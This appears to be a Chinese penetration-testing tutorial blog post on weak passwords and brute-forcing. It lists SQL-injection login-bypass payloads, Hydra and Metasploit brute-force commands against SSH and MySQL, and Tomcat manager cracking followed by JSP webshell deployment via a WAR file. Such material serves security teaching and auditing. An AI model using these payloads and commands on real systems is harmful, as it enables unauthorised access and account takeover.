弱口令及暴力破解

发布于 2021-02-12  644 次阅读

《渗透测试》目录

弱口令及暴力破解

弱口令:容易被别人猜测到或被破解工具破解的口令均为弱口令。一般指的是仅包含简单数字和母的口令。

弱口令产生原因:安全意识不够。

公共弱口令:公共弱口令就是常见的密码,也就是根据大量的密码数据统计得出的出现频率较高的弱口令。

条件弱口令:一般与个人信息有关,比如姓名生日等身份信息和指定字符。

1.万能密码:

  • 一般登陆后台时通过select * from user where username="&user&" and password="&pwd&"语句对用户名和密码进行匹配。
  • 当用户输入用户名'or'' = '时,相应的语句就变成了select * from admin where username = '' or '' ='' and password = ‘’
  • 在这个语句中,where后面所指定的条件永久成立,因而就可以绕过身份验证,也就成为了所谓的万能密码。

Asp/aspx万能密码

  • "or "a"="a
  • ')or('a'=‘a
  • or 1=1–
  • 'or 1=1–
  • a'or' 1=1–
  • "or 1=1–
  • 'or'a'='a
  • "or"="a'='a
  • 'or"='
  • 'or'='or'

php/jsp万能密码

  • 'or'='or'
  • 'or 1=1/* 字符型 GPC是否开都可以使用 User: something
  • Pass: ' OR '1'='1

jsp 万能密码

  • 1'or'1'='1
  • admin' OR 1=1/*
  • 用户名:admin 系统存在这个用户的时候才用得上 密码:1'or'1'='1

2.暴力破解字典

3.常见工具

  • Burpsuite
  • SNETCracker

4.应用场景

  • 不含验证码后台
  • 不失效的验证码
  • Phpmyadmin/tomcat
  • 各类协议:FTP、SSH、RDP、MYSQL等

5.暴力破解&Getshell(以Tomcat为例)

  • tomcat识别发现

· Tomcat默认页面:略,看到就知道了,是一只猫

· 通过抓包分析: Authoritarian字段

· burp中的Intruder模块,相关字段用法略(基础知识)

  • tomcat后台爆破

·Authoritarian字段保存账户密码(base64加密)

·部署War包

----制作方法:将jsp马压缩成zip文件,再将zip后缀改为war

----cmd:jar –cvf *.war *.jsp

·Getshell http://ip:port/warname/filename.jsp

6.暴力破解工具介绍

(1)Hydra:Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装,其中Kali Linux中自带Hydra。

hydra -l root -p root 127.0.0.1 -s 2222 ssh -f

  • -l:login 指定破解的用户,对特定用户破解。
  • -L:FILE 指定用户名字典。
  • -p:PASS 小写,指定密码破解,少用,一般采用密码字典。
  • -P:FILE 大写,指定密码字典。
  • -s:PORT 指定爆破端口。
  • -M:FILE 指定目标列表字典。
  • -C:FILE 使用冒号分割格式,例如“登陆名:密码”来代替-L/-P参数。
  • -f 在使用-M参数以后,找到第一对登录名或者密码得时候中止破解。

(2)SNETCracker:SNETCracker 超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批 量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查, 大大提高成功率,支持自定义服务端口和字典。

工具特点

  • 支持多种常见服务的口令破解,支持RDP(3389远程桌面)弱口令检查。
  • 支持批量导入IP地址或设置IP段,同时进行多个服务的弱口令检查。
  • 程序自带端口扫描功能,可以不借助第三方端口扫描工具进行检查。
  • 支持自定义检查的口令,自定义端口

用法示例

  • 192.168.1.1
  • www.ddosi.com
  • 192.168.1.1-192.168.200.255
  • 192.168.1.1-192.168.1.255

(3)MSF auxiliary/scanner/

  • search login

7.暴力破解各种应用

(1)Hydra破解ssh

  • hydra -L /opt/Weakpassword/dict/ssh/username.txt -P
  • /opt/Weakpassword/dict/ssh/password.txt 192.168.78.19 ssh -f

(2)Hydra破解mysql

  • hydra -L /opt/Weakpassword/dict/ssh/username.txt -P
  • /opt/Weakpassword/dict/ssh/password.txt 192.168.74.144 mysql -f

(3)MSF破解ssh

  • use auxiliary/scanner/ssh/ssh_login
  • set RHOSTS x.x.x.x
  • set USER_FILE
  • /root/Desktop/tools/dic_username_ssh.txt
  • set PASS_FILE /root/Desktop/tools/pwd100.txt

人生就像赛跑,不在乎你是否第一个到达终点,而在乎你是否跑完全程。